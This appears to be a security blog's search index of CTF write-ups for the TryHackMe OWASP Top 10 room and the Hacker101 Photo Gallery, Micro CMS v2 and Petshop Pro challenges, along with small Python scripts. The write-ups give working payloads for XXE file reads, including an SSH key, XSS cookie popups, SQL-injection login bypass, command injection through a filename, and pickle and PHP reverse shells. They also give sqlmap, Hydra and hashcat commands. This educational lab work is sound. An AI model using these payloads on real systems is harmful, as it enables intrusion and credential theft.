index.json
[{"content":"What \u0026ldquo;This room breaks each OWASP topic down and includes details on what the vulnerability is, how it occurs and how you can exploit it. You will put the theory into practise by completing supporting challenges.\u0026rdquo;\nDifficulty: Easy\nBadge:\nTryHackMe Page\nOWASP Page\n#1 - Injection \u0026ldquo;Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing data without proper authorization.\u0026rdquo;\nOWASP Page\nTask 5 / Question 1 - What strange text file is in the website root directory? Start the VM and navigate to http://$MACHINE_IP/evilshell.php\nRun ls\nTask 5 / Question 2 - How many non-root/non-service/non-daemon users are there? Use cat /etc/passwd and look for \u0026lsquo;regular\u0026rsquo; users\nTask 5 / Question 3 - What user is this app running as? Use whoami\nTask 5 / Question 4 - What is the user\u0026rsquo;s shell set as? Run cat /etc/passwd | grep $username where \u0026lsquo;$username\u0026rsquo; is from Question 3\nTask 5 / Question 5 - What version of Ubuntu is running? Retrieve version number with lsb_release -d\nTask 5 / Question 6 - Print out the MOTD. What favorite beverage is shown? Get the answer with cat /etc/update-motd.d/00-header\n#2 - Broken Authentication \u0026ldquo;Application functions related to authentication and session management are often implemented incorrectly, allowing attackers to compromise passwords, keys, or session tokens, or to exploit other implementation flaws to assume other users’ identities temporarily or permanently.\u0026rdquo;\nOWASP Page\nTask 7 / Question 1 - What is the flag that you found in darren\u0026rsquo;s account? 
Simple - register with \u0026quot; darren\u0026quot;, a random email address and a password.\nTask 7 / Question 2 - Now try to do the same trick and see if you can login as arthur Sure it does work.\nTask 7 / Question 3 - What is the flag that you found in arthur\u0026rsquo;s account? Do the same as with \u0026quot; darren\u0026quot; and you\u0026rsquo;ll get the flag.\n#3 - Sensitive Data Exposure \u0026ldquo;Many web applications and APIs do not properly protect sensitive data, such as financial, healthcare, and PII. Attackers may steal or modify such weakly protected data to conduct credit card fraud, identity theft, or other crimes. Sensitive data may be compromised without extra protection, such as encryption at rest or in transit, and requires special precautions when exchanged with the browser.\u0026rdquo;\nOWASP Page\nTask 11 / Question 1 - What is the name of the mentioned directory? Only one folder is mentioned in the html source.\nTask 11 / Question 2 - Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? Navigate to the mentioned directory, it is vulnerable to directory listing. You\u0026rsquo;ll see a file that shouldn\u0026rsquo;t be visible.\nTask 11 / Question 3 - Use the supporting material to access the sensitive data. What is the password hash of the admin user? By following the supporting material in Task 9, you should be able to extract the password hash from the database file.\nNote that the hash is in the 3rd column.\nTask 11 / Question 4 - Crack the hash. What is the admin\u0026rsquo;s plaintext password? Follow the steps as described in Task 10 to get the plaintext password.\nYou can also crack the hash locally. First, identify the hash type with hash-identifier. Looks like, it\u0026rsquo;s an MD5 hash.\nSave the hash into a txt file. Look up on this page, which hash-mode you should use for Hashcat to crack the MD5. 
Finally, run Hashcat.\nhashcat -m 0 -a 0 -w 3 -O hash.txt /usr/share/wordlists/rockyou.txt Task 11 / Question 5 - Login as the admin. What is the flag? Get the flag using the cracked password.\n#4 - XML External Entities (XXE) \u0026ldquo;Many older or poorly configured XML processors evaluate external entity references within XML documents. External entities can be used to disclose internal files using the file URI handler, internal file shares, internal port scanning, remote code execution, and denial of service attacks.\u0026rdquo;\nOWASP Page\nTask 16 / Question 1 - Try to display your own name using any payload With a small modification of the example in Task 15:\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE replace [\u0026lt;!ENTITY name \u0026#34;feast\u0026#34;\u0026gt; ]\u0026gt; \u0026lt;userInfo\u0026gt; \u0026lt;firstName\u0026gt;My Own Name\u0026lt;/firstName\u0026gt; \u0026lt;/userInfo\u0026gt; Task 16 / Question 2 - See if you can read the /etc/passwd Indeed, using the example from Task 15 without touching it:\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY read SYSTEM \u0026#39;file:///etc/passwd\u0026#39;\u0026gt;]\u0026gt; \u0026lt;root\u0026gt;\u0026amp;read;\u0026lt;/root\u0026gt; Task 16 / Question 3 - What is the name of the user in /etc/passwd It is the last entry in the passwd file - \u0026ldquo;falcon\u0026rdquo; as it is spoiled in the next questions..\nTask 17 / Question 4 - Where is falcon\u0026rsquo;s SSH key located? 
It is in the default directory, using the default filename: run ssh-keygen if unsure.\nTask 17 / Question 5 - What are the first 18 characters for falcon\u0026rsquo;s private key Just a small path modification on the payload we used to retrieve the passwd file:\n\u0026lt;?xml version=\u0026#34;1.0\u0026#34;?\u0026gt; \u0026lt;!DOCTYPE root [\u0026lt;!ENTITY read SYSTEM \u0026#39;file:///home/falcon/.ssh/id_rsa\u0026#39;\u0026gt;]\u0026gt; \u0026lt;root\u0026gt;\u0026amp;read;\u0026lt;/root\u0026gt; You should copy the first 18 characters of the key\n-----BEGIN RSA PRIVATE KEY----- [copy the first 18 chars from here][rest of the key] -----END RSA PRIVATE KEY----- #5 - Broken Access Control \u0026ldquo;Restrictions on what authenticated users are allowed to do are often not properly enforced. Attackers can exploit these flaws to access unauthorized functionality and/or data, such as access other users’ accounts, view sensitive files, modify other users’ data, change access rights, etc.\u0026rdquo;\nOWASP Page\nTask 18 / Question 3 - Look at other users notes. What is the flag? As you log on with the given credentials noot and test1234, you\u0026rsquo;ll see a note. What you see in the address bar is the definition of IDOR (Insecure Direct Object Reference).\nWork on that number that identifies the displayed note. You can try a few numbers manually, or some automatization for a larger pool of numbers. Anyway, just start from the beginning ;)\n#6 - Security Misconfiguration \u0026ldquo;Security misconfiguration is the most commonly seen issue. This is commonly a result of insecure default configurations, incomplete or ad hoc configurations, open cloud storage, misconfigured HTTP headers, and verbose error messages containing sensitive information. 
Not only must all operating systems, frameworks, libraries, and applications be securely configured, but they must be patched/upgraded in a timely fashion.\u0026rdquo;\nOWASP Page\nTask 19 / Question 2 - Hack into the webapp and find the flag After deploying the VM, we can see the application name. Google for it and follow the first result (should be the GitHub repo of the app). Go through the README.md and find the default credentials on the bottom of the page (\u0026ldquo;Specifically, this VM focusses on default passwords\u0026rdquo;). Use those credentials to get the flag. #7 - Cross-Site Scripting (XSS) \u0026ldquo;XSS flaws occur whenever an application includes untrusted data in a new web page without proper validation or escaping, or updates an existing web page with user-supplied data using a browser API that can create HTML or JavaScript. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.\u0026rdquo;\nOWASP Page\nNow, this is fun!\nTask 20 / Question 2 - \u0026hellip; craft a reflected XSS payload that will cause a popup saying \u0026ldquo;Hello\u0026rdquo; Use a very basic payload here:\n\u0026lt;script\u0026gt;alert(\u0026#39;Hello\u0026#39;);\u0026lt;/script\u0026gt; Task 20 / Question 3 - \u0026hellip; craft a reflected XSS payload that will cause a popup with your machines IP address Refer to w3schools, or HTML Living Standards or Mozilla on this.\n\u0026lt;script\u0026gt;alert(window.location.hostname);\u0026lt;/script\u0026gt; Task 20 / Question 4 - \u0026hellip; add a comment and see if you can insert some of your own HTML First, I tried to insert a HTML element, without luck. 
Then I inserted a simple horizontal rule, which revealed the next flag.\n\u0026lt;hr\u0026gt; Task 20 / Question 5 - \u0026hellip; create an alert popup box appear on the page with your document cookies Read more on w3schools or Mozilla. The property is document.cookie (singular); a typo in the name gives you a popup saying \u0026ldquo;undefined\u0026rdquo; instead of the cookies.\n\u0026lt;script\u0026gt;alert(document.cookie);\u0026lt;/script\u0026gt; Task 20 / Question 6 - Change \u0026ldquo;XSS Playground\u0026rdquo; to \u0026ldquo;I am a hacker\u0026rdquo; by adding a comment using Javascript First, check the page source and look for the title with the \u0026ldquo;XSS Playground\u0026rdquo; value (use Ctrl+Shift+C or the \u0026ldquo;Select an element\u0026rdquo; icon).\nAgain, refer to w3schools, Mozilla or StackOverflow - notice that the XSS vulnerability is mentioned in a comment.\n\u0026lt;script\u0026gt;document.getElementById(\u0026#34;thm-title\u0026#34;).innerHTML = \u0026#34;I am a hacker\u0026#34;;\u0026lt;/script\u0026gt; #8 - Insecure Deserialization \u0026ldquo;Insecure deserialization often leads to remote code execution. Even if deserialization flaws do not result in remote code execution, they can be used to perform attacks, including replay attacks, injection attacks, and privilege escalation attacks.\u0026rdquo;\nOWASP Page\nTask 25 / Question 1 - 1st flag (cookie value) Copy the value of the sessionId cookie and decode it in a terminal (it is plain base64, neither encrypted nor signed). With the copied value in $sessionId, use double quotes so the variable actually expands:\necho -n \u0026#34;$sessionId\u0026#34; | base64 --decode Task 25 / Question 2 - 2nd flag (admin dashboard) Change the value of the \u0026ldquo;userType\u0026rdquo; cookie from \u0026ldquo;user\u0026rdquo; to \u0026ldquo;admin\u0026rdquo;. The server trusts a role stored on the client side without any integrity check.\nTask 26 / Question 1 - flag.txt Following the task description, change the value of the userType cookie back from \u0026ldquo;admin\u0026rdquo; to \u0026ldquo;user\u0026rdquo; and return to the myprofile page.\nClick on \u0026ldquo;Exchange your vim\u0026rdquo;. This will create another cookie, called \u0026ldquo;encodedPayload\u0026rdquo;, with some default value. 
We will update this.\nDownload pickleme.py from the task description and edit it with your favorite editor. Replace \u0026ldquo;YOUR_TRYHACKME_VPN_IP\u0026rdquo;. Also, start netcat listening on port 4444.\nRun pickleme to generate a base64 encoded payload that will connect from the remote server to your computer\u0026rsquo;s port, where netcat is listening. Grab the string between the quotation marks.\nUpdate the value of the \u0026ldquo;encodedPayload\u0026rdquo; cookie with the output string from the previous step.\nNavigate to the feedback page and refresh. The server base64-decodes and unpickles the updated cookie value, and unpickling attacker-controlled data executes the payload, which opens a remote shell from the web server back to netcat (read the task description).\nDon\u0026rsquo;t be like me - I hadn\u0026rsquo;t read the description thoroughly, which is why the timestamps and commands are inconsistent (compared to previous ones) on the last screenshot..\n#9 - Using Components with Known Vulnerabilities \u0026ldquo;Components, such as libraries, frameworks, and other software modules, run with the same privileges as the application. If a vulnerable component is exploited, such an attack can facilitate serious data loss or server takeover. Applications and APIs using components with known vulnerabilities may undermine application defenses and enable various attacks and impacts.\u0026rdquo;\nOWASP Page\nTask 29 / Question 1 - How many characters are in /etc/passwd There are multiple ways to get a remote shell on this VM. Let me show the short way first.\nOpen Exploit Database and look for \u0026ldquo;online book store\u0026rdquo;. If you are looking for \u0026ldquo;CSE bookstore\u0026rdquo;, you won\u0026rsquo;t find the RCE exploit (described in the long version).\nHow did I get \u0026ldquo;online book store\u0026rdquo;? Follow the link at the bottom of the home page to projectworlds.in and look for \u0026ldquo;book store\u0026rdquo;. Grab the first 3 words of the result and drop them into the search bar of exploit-db.\nDownload and execute the exploit. 
The only required parameter is the IP of the VM.\nClean and elegant exploit from Tib3rius, follow him on Twitter, Twitch and YouTube.\nJob\u0026rsquo;s done.\nLong(er) version.\nYes, I was looking for \u0026ldquo;CSE bookstore\u0026rdquo; on exploit-db. There is an exploit for authentication bypass that I\u0026rsquo;ve used to get admin on the website. Use the credentials you can see in the 48960 (SQL injection on /admin.php).\nOpen netcat to listen port 4444\nsudo nc -lvnp 4444 Add a new book.\nAdd details:\nFor ISBN, add an integer as it will be used to identify the book (/books.php?bookisbn=1) For Publisher, select something that already exists in the database As an Image, select your prepared (IP address, port) payload. I used a php reverse shell from pentestmonkey, only updated with my VPN IP address and the port where netcat is listening.\nNavigate to the books page to activate the payload.\nEnjoy the remote shell.\n#10 - Insufficient Logging \u0026amp; Monitoring \u0026ldquo;Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, pivot to more systems, and tamper, extract, or destroy data. Most breach studies show time to detect a breach is over 200 days, typically detected by external parties rather than internal processes or monitoring.\u0026rdquo;\nOWASP Page\nTask 30 / Question 1 - What IP address is the attacker using? We can see a few 401 Unauthorized login attempts in the downloaded logfile. Use the IP address from these lines.\nTask 30 / Question 2 - What kind of attack is being carried out? 
The logfile makes it obvious that someone at the same IP address is trying default account names (\u0026lsquo;admin\u0026rsquo;, \u0026lsquo;administrator\u0026rsquo;, \u0026lsquo;anonymous\u0026rsquo;, \u0026lsquo;root\u0026rsquo;) one after another: a brute force attack looking for Broken Authentication.\n","permalink":"https://d0rksec.github.io/writeups/thm/owasptop10/","summary":"Top 10 web application vulnerabilities (2017 list)","title":"TryHackMe - OWASP Top 10"},{"content":"What Used this script first to solve Flag 3 on Hacker101 CTF/Postbook by loading the list into Burp Suite as a payload to brute force the id= parameter.\nSource #!/usr/bin/python3 df=open(\u0026#39;numbers.txt\u0026#39;,\u0026#39;w\u0026#39;) for i in range(0,1000): df.write(str(i)) df.write(\u0026#39;\\n\u0026#39;) df.close() Download\nRun chmod +x wordlist.py \u0026amp;\u0026amp; python3 wordlist.py\nMisc Another example to generate a list of urls with a regex and save it as a text file.\n#!/usr/bin/python3 import sre_yield df=open(\u0026#39;urls.txt\u0026#39;,\u0026#39;w\u0026#39;) for each in sre_yield.AllStrings(r\u0026#39;https://0x[a-z0-9][a-z0-9]\\.a\\.hackycorp\\.com\u0026#39;): df.write(str(each)) df.write(\u0026#39;\\n\u0026#39;) df.close() ","permalink":"https://d0rksec.github.io/notes/scripts/python-wordlist-generator/","summary":"Generate a (word)list in text file","title":"Python Wordlist Generator"},{"content":"What I used this script to solve the Recon 10 challenge on Pentesterlab (FREE).\nSource #!/usr/bin/python3 import os import sre_yield for each in sre_yield.AllStrings(r\u0026#39;0x[a-f0-9][a-f0-9]\\.a\\.hackycorp\\.com\u0026#39;): os.system(\u0026#34;wget \u0026#34; + each + \u0026#34;/logo.png\u0026#34;) Download\nPrep On Kali, I had to install sre_yield with pip3 install sre_yield. (The script calls os.system, so it also needs import os, which the original was missing.)\nRun chmod +x download-recon10.py \u0026amp;\u0026amp; python3 download-recon10.py\nMisc Aquatone was recommended in the challenge description. 
For this, I\u0026rsquo;ve modified the above script to generate the list of urls in a text file:\n#!/usr/bin/python3 import sre_yield df=open(\u0026#39;urls.txt\u0026#39;,\u0026#39;w\u0026#39;) for each in sre_yield.AllStrings(r\u0026#39;https://0x[a-z0-9][a-z0-9]\\.a\\.hackycorp\\.com\u0026#39;): df.write(str(each)) df.write(\u0026#39;\\n\u0026#39;) df.close() Download\nGenerate the list of urls with chmod +x urllist.py \u0026amp;\u0026amp; python3 urllist.py, then run cat urls.txt | aquatone -chrome-path /opt/google/chrome/chrome -debug.\nIf we know what specific file we would need to solve the challenge, the first method is much faster.\nReferences reddit comment on os.system(wget) stackoverflow comment on regex stackoverflow comment on sre_yield ","permalink":"https://d0rksec.github.io/notes/scripts/python-downloader/","summary":"Download the same file from regex-generated list of urls","title":"Python Downloader"},{"content":"What A Flask web application that pulls images from a database.\nDifficulty: Moderate\nFlag0 Hint0: Consider how you might build this system yourself. What would the query for fetch look like? The actual code of backend application would depend on what language (php, python, etc.) was used, but there are some common steps one would follow.\nPut the value of (image) id= parameter into a variable Create a database connection - this includes hostname/IP, database name, username, password, maybe a port number if not using the default (more here) Construct the sql query - it can take multiple steps and variables for complex queries Run the query with a function Use a function to fetch the query result In our case, the query will look something like this:\nSELECT data FROM table WHERE id=$id\nHint1: Take a few minutes to consider the state of the union As the original query returns data from one column, we can add another column with union. 
Quick recap on union.\nIn the source code we see that images are loaded with \u0026lt;img src=\u0026quot;fetch?id=1\u0026quot;. Let\u0026rsquo;s check if fetch parameter is prone to union attack.\n/fetch?id=1 will load the raw image. /fetch?id=1 order by 1 still works, however, with order by 2 (and above) it throws an Internal Server Error. /fetch?id=1 union select null also loads the raw image, ISE for select null,null. By reflex, one would try to call the missing image with /fetch?id=3 to see the result (Internal Server Error). Maybe check, if something is hidden with a higher index number?\nJust catch the request with Burp, pass it to Intruder and leave id=§3§ as payload position. On the Payloads tab, load some wordlist containing numbers and start attack.\nThe results show that id 1 and 2 will result a 200 OK, id 3 will throw a Server Error and all other values will drop a 404.\nHint2: This application runs on the uwsgi-nginx-flask-docker image Google for \u0026ldquo;uwsgi-nginx-flask-docker\u0026rdquo;. Check the GitHub and the Docker pages.\nAs we can read in the description, \u0026ldquo;This Docker image allows you to create Flask web applications in Python that run with uWSGI and Nginx in a single container.\u0026rdquo;\nIn the How to use section on the Docker page we can see that\n\u0026quot;By default it will try to find a uWSGI config file in /app/uwsgi.ini.\u0026quot;\nFirst, let\u0026rsquo;s see if we can retrieve this file with a union query. 
Use any id value that returns a 404 (see above), so that only the union row comes back and the file contents are shown cleanly. The fetch handler evidently opens whatever filename the query returns, which turns the injection into an arbitrary file read:\n/fetch?id=4 union select 'uwsgi.ini'\nThe application\u0026rsquo;s name is main (.py)\nAlso, in the Quick start section of the GitHub page, the first example is about how to create an application called main.py (in case we have to guess).\nWe can now retrieve this file too, with the first flag:\n/fetch?id=4 union select 'main.py'\nFlag1 Hint0: I never trust a kitten I can\u0026rsquo;t see Yes, the third picture is missing. Reasons could be:\nThe file path stored in the database does not match the filename The file path is okay, but there is no file uploaded The file path does not fit the data type of the column \u0026hellip; Hint1: Or a query whose results I can\u0026rsquo;t see, for that matter /fetch?id=3 is throwing an Internal Server Error. Not a 404, but 5xx.\nTime to use sqlmap. First, we have to save the above request as a .txt file (with Burp).\nNext, retrieve the databases using the vulnerable request:\nsqlmap -r fetch.txt --dbs --random-agent --threads 10 available databases [4]: [*] information_schema [*] level5 [*] mysql [*] performance_schema Next, see the tables in the level5 database:\nsqlmap -r fetch.txt -D level5 --tables --random-agent --threads 10 Database: level5 [2 tables] +--------+ | albums | | photos | +--------+ What\u0026rsquo;s in albums?\nsqlmap -r fetch.txt -D level5 -T albums --dump --random-agent --threads 10 Database: level5 Table: albums [1 entry] +----+---------+ | id | title | +----+---------+ | 1 | Kittens | +----+---------+ Not much, let\u0026rsquo;s see photos:\nsqlmap -r fetch.txt -D level5 -T photos --dump --random-agent --threads 10 Database: level5 Table: photos [3 entries] +----+------------------+--------+------------------------------------------------------------------+ | id | title | parent | filename | +----+------------------+--------+------------------------------------------------------------------+ | 1 | Utterly 
adorable | 1 | files/adorable.jpg | | 2 | Purrfect | 1 | files/purrfect.jpg | | 3 | Invisible | 1 | IAMSOSORRYIAMSOSORRYIAMSOSORRYIAMSOSORRYIAMSOSORRYIAMSOSORRY | +----+------------------+--------+------------------------------------------------------------------+ Second flag is the filename column of the third photo.\nFlag2 Hint0: That method of finding the size of an album seems suspicious From main.py:\nrep += \u0026#39;Space used: \u0026#39; + subprocess.check_output(\u0026#39;du -ch %s || exit 0\u0026#39; % \u0026#39; \u0026#39;.join(\u0026#39;files/\u0026#39; + fn for fn in fns), shell=True, stderr=subprocess.STDOUT).strip().rsplit(\u0026#39;\\n\u0026#39;, 1)[-1] + \u0026#39;\u0026#39; rep += \u0026#39;\\n\u0026#39; Hint1: Stacked queries rarely work. But when they do, make absolutely sure that you\u0026rsquo;re committed OK, for this one I used this writeup.\nWe have to use COMMIT; (\u0026quot;.. you\u0026rsquo;re committed\u0026quot;) to execute our query.\nFrom EDUCBA:\n\u0026quot;A COMMIT command in SQL is an essential command that is used after Data Manipulation Language (DML) operations like INSERT, DELETE and UPDATE transactions.\u0026quot;\nHint2: Be aware of your environment Environment variables. printenv.\nIn the writeup, there is a payload that sets the filename to ;echo $(printenv) for the image with id=3, which then gets injected into the application when it calculates space used.\n/fetch?id=3; update photos set filename=\u0026quot;;echo $(printenv)\u0026quot; where id=3; commit;\nRefresh homepage:\nTakeaway(s) Realized that SQLI is not only ' OR 1=1 #.. Without the referred writeup, I would still stare at the screen.. 
Practice with multiple web app frameworks, even if only going through the \u0026quot;Getting started\u0026quot; tutorials ","permalink":"https://d0rksec.github.io/writeups/h101/photo_gallery/","summary":"A Flask web app with a database","title":"Hacker101 - Photo Gallery"},{"content":"What A CMS with a Python backend, prone to SQL injection.\nDifficulty: Moderate\nFlag0 Hint0: Regular users can only see public pages Start with wandering around the site, visiting all available pages to feed the site map in Burp.\nAs we can see on the Changelog page (/page/1), user authentication has been implemented, so by default, only admins can add or edit pages.\nAs a regular user, we can visit (load without authenticating on /login) the following pages:\n/home /login /page/1 /page/2 Can\u0026rsquo;t hurt if we run gobuster and dirb too, right? Only /logout was found by both in addition to what we had before.\ngobuster dir -u https://IAMSOSORRY.ctf.hacker101.com/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -z -t 100 Let\u0026rsquo;s run dirb too.\ndirb https://IAMSOSORRY.ctf.hacker101.com/ It made me a bit upset that dirb did not find anything under /page, so I quickly modified my wordlist-generator script (used in Postbook) to create an index list [1-100]. Running dirb with this wordlist on /page revealed /page/3, which is Forbidden.\ndirb https://IAMSOSORRY.ctf.hacker101.com/page/ ~/scripts/numbers100.txt Hint1: Getting admin access might require a more perfect union The hint tells us that the login page is vulnerable to SQL Injection. 
Starting with a basic payload (') in the Username field generated an error message.\nTraceback (most recent call last): File \u0026#34;./main.py\u0026#34;, line 145, in do_login if cur.execute(\u0026#39;SELECT password FROM admins WHERE username=\\\u0026#39;%s\\\u0026#39;\u0026#39; % request.form[\u0026#39;username\u0026#39;].replace(\u0026#39;%\u0026#39;, \u0026#39;%%\u0026#39;)) == 0: File \u0026#34;/usr/local/lib/python2.7/site-packages/MySQLdb/cursors.py\u0026#34;, line 255, in execute self.errorhandler(self, exc, value) File \u0026#34;/usr/local/lib/python2.7/site-packages/MySQLdb/connections.py\u0026#34;, line 50, in defaulterrorhandler raise errorvalue ProgrammingError: (1064, \u0026#34;You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near \u0026#39;;\u0026#39;\u0026#39; at line 1\u0026#34;) Showing clients this much error detail is bad practice; it happens here because error reporting is left enabled on a live page. For us, the traceback gives away a MariaDB (MySQL-compatible) server in the backend, the Python 2.7 MySQLdb driver, and the exact query, built by %-formatting the raw username straight into the SQL string.\nHere you can see a complete list of payloads to be used against a MySQL database.\nFollowing the hint, we should focus on the Union Based section of the page. A few documents worth a look before continuing:\nthis gem from PortSwigger, Invicti\u0026#39;s SQL Injection Cheat Sheet, Advanced SQL Injection: Union based from VK9 Security, Let\u0026rsquo;s determine how many columns are being returned from the original query with\n' order by 1;\n' order by 2;\n' order by 3;\nThe first query results in an \u0026ldquo;Unknown user\u0026rdquo; message, the others end up with error details. We need only one column.\nIf we try with\n' union select null;\n' union select null,null; ' union select null,null,null;\nas Name, we can see that the first union query throws an \u0026ldquo;Invalid password\u0026rdquo;, the others give us the error details.\nLook at the error message again. 
The query behind the scenes, as the traceback shows, is\nSELECT password FROM admins WHERE username='[username field]'\nIt only fetches the stored password for that username; the application then compares the fetched value with what we typed into the password field. That explains the two messages we saw: no row means \u0026ldquo;Unknown user\u0026rdquo;, a row whose value does not match means \u0026ldquo;Invalid password\u0026rdquo;.\nOur Union-based payload will replace the second part of the original query, from the username\u0026rsquo;s closing ', something like this:\nSELECT password FROM admins WHERE username=' [payload]\nAs we need only one column, let\u0026rsquo;s make the query return a fixed value as the password, the same value we will provide in the password field (no real username needed):\nSELECT password FROM admins WHERE username='' UNION SELECT '123' AS password#\nUsername: ' UNION SELECT '123' AS password# #you don\u0026rsquo;t need uppercase letters..\nPassword: 123\nHere you can see a more detailed answer on why/how the above query works.\nIf you catch the request in Burp, you\u0026rsquo;ll see this:\nusername=%27+union+select+%27123%27+as+password%23\u0026amp;password=123 Fantastic, we\u0026rsquo;re in:\nHint2: Knowing the password is cool, but there are other approaches that might be easier After logon, an additional page is added to the links: /page/3, which was forbidden before.\nThe page reveals the first FLAG.\nAlternatively, we can also reveal this FLAG with sqlmap, when dumping the pages table:\nsqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 -T pages --dump --random-agent --threads 10 See more details for sqlmap in Flag2.\nFlag1 Hint0: What actions could you perform as a regular user on the last level, which you can\u0026rsquo;t now? We were able to create and edit pages. On this level, we have to log on first.\nHint1: Just because request fails with one method doesn\u0026rsquo;t mean it will fail with a different method When it comes to changing the request method, our usual friends will be Burp and cURL.\nWith Burp, we can intercept the request and replace GET with POST.\ncURL\u0026rsquo;s default request method is (also) GET. 
We can change the request method to POST with -X POST.\nHint2: Different requests often have different required authorization Burp (intercept the request):\ncURL:\nChange the request method from GET to POST.\nBurp:\nAnother FLAG.\ncURL:\nFlag2 Hint0: Credentials are secret, flags are secret. Coincidence? We already know that the login fields are vulnerable to injection, but an SQLi challenge wouldn\u0026rsquo;t be complete without using sqlmap - also, there is much to learn even from its output.\nFirst, I\u0026rsquo;ve saved the GET request with Burp Intercept as login.txt (username=user and password=pass).\nLet\u0026rsquo;s see how sqlmap lists databases.\nsqlmap -r ~/h101/micro-cms_v2/login.txt --dbs --random-agent --threads 10 We have the database name (level2), now get the tables with:\nsqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 --tables --random-agent --threads 10 Let\u0026rsquo;s dump the admins table.\nsqlmap -r ~/h101/micro-cms_v2/login.txt -D level2 -T admins --dump --random-agent --threads 10 Using the credentials above for login, we see the third FLAG.\nTakeaway(s) Use \u0026ldquo;Incorrect username and/or password\u0026rdquo; instead of revealing which of the two fields has an invalid value Try changing the request method between GET and POST Don\u0026rsquo;t rely on automated tools, understand what they are doing Experience with different tools for the same task ","permalink":"https://d0rksec.github.io/writeups/h101/micro-cms_v2/","summary":"Improved CMS with password authentication","title":"Hacker101 - Micro CMS_v2"},{"content":"What A small webshop with username/password authentication to crack.\nDifficulty: Easy\nFlag0 Hint0: Something looks out of place with checkout Let\u0026rsquo;s fire up Burp, set Scope, turn off intercept and just walk through the application. 
This will create a Site map on Target tab.\nI\u0026rsquo;ve added both images to the cart and examined the checkout request.\nOn the Checkout page we can see \u0026ldquo;Payments temporarily disabled\u0026rdquo;.\nHint1: It\u0026rsquo;s always nice to get free stuff Cart value is passed to the server as URL encoded string. We can use Burp Inspector\u0026rsquo;s Decode feature to read it as JSON.\n[[0, {\u0026#34;logo\u0026#34;: \u0026#34;kitten.jpg\u0026#34;, \u0026#34;price\u0026#34;: 8.95, \u0026#34;name\u0026#34;: \u0026#34;Kitten\u0026#34;, \u0026#34;desc\u0026#34;: \u0026#34;8\\\u0026#34;x10\\\u0026#34; color glossy photograph of a kitten.\u0026#34;}]] How about changing the price to 0.00? We can now turn Burp\u0026rsquo;s intercept on and hit Check Out again.\nNow forward the edited request and grab the free stuff plus the first FLAG.\nFlag1 Hint0: There must be a way to administer the app It is common to have an admin page, even for small sites. They also tend to share common names, like /admin.php.\nTo access admin pages, users must authenticate themselves, using pages like /login.php.\nHint1: Tools may help you find the entrypoint Sure. Let\u0026rsquo;s check what other pages are there. 
For this, I used gobuster with a command:\ngobuster dir -u https://IAMSOSORRY.ctf.hacker101.com/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-small.txt -z -t 100 -u \u0026lt;URL\u0026gt;\n-w \u0026lt;/path/to/wordlist-file\u0026gt; (start with a smaller list for low-hanging fruit)\n-t \u0026lt;threads\u0026gt; (default is 10)\n-z (to turn off the annoying \u0026ldquo;Progress\u0026rdquo; messages and show only hits)\nGobuster repo and full description for dir mode here.\nCheck the first result (note that the results are folders): Hint2: Tools are also great for finding credentials To see how the page responds, I submitted admin / password as credentials:\nYou can see that the error handling gives us too much info about what\u0026rsquo;s wrong here (\u0026ldquo;Invalid username\u0026rdquo;). Better practice is to show \u0026ldquo;Invalid username or password\u0026rdquo;, so that the attacker has to brute force combinations of usernames and passwords rather than each field on its own.\nIn our case, we have to find a correct username first, then we can go for the valid password.\nI\u0026rsquo;ll brute force the username with Hydra, using a wordlist for usernames from SecLists.\nhydra -L ~/repo/SecLists/Usernames/Names/names.txt -p \u0026#34;password\u0026#34; IAMSOSORRY.ctf.hacker101.com https-post-form \u0026#34;/login:username=^USER^\u0026amp;password=^PASS^:Invalid username\u0026#34; We\u0026rsquo;ve got the username. Let\u0026rsquo;s go for the password. I\u0026rsquo;ll use the same wordlist.\nhydra -l IAMSOSORRY -P ~/repo/SecLists/Usernames/Names/names.txt IAMSOSORRY.ctf.hacker101.com https-post-form \u0026#34;/login:username=^USER^\u0026amp;password=^PASS^:Invalid password\u0026#34; We can use the credentials on /login. It will reveal the Edit feature below the images and show us the second FLAG.\nFlag2 Hint0: Always test every input Now that we are able to edit the product\u0026rsquo;s parameters, let\u0026rsquo;s try some basic XSS on the input fields. 
I\u0026rsquo;ll use numbers in alert messages to see which attack was successful.\nInternal Server Error.. OK, let\u0026rsquo;s try them one-by-one, starting with Name.\nSaved the changes, back to Home page. The pop-up message says that Name field is vulnerable to XSS.\nRestore Name to Kitten and add payload to Description. Save.\nBack to Home page. Our XSS on Description field has also worked.\nRemove payload from Description and add to Price.\nAfter saving, the Internal Server Error is back. At least, we know which field has caused it.\nBut, where\u0026rsquo;s my FLAG?\nHint1: Bugs don\u0026rsquo;t always appear in a place where the data is entered Let\u0026rsquo;s put the payload back to Name field, hit Save and head to Home page. Add a Kitten to the Cart.\nThe FLAG is included in the Shopping Cart.\nTakeaway(s) Look what parameters are passed with the form Web login hack can take some time on a VM, relax ","permalink":"https://d0rksec.github.io/writeups/h101/petshop_pro/","summary":"Small webshop with login form to crack","title":"Hacker101 - Petshop Pro"},{"content":"What This is a small PHP site with private/public posts.\nDifficulty: Easy\nFlag0 Hint0: The person with username \u0026quot;user\u0026quot; has a very easy password Check 500-worst-passwords.txt in danielmiessler\u0026#39;s SecLists and the second password will give you the first FLAG.\nNo brute forcing needed.\nSign in on /index.php?page=sign_in.php and use the credentials user and password.\nFlag1 Hint0: Try viewing your own post and then see if you can change the ID Open My profile.\nCheck the address bar, what is id=c? It is our user ID. 
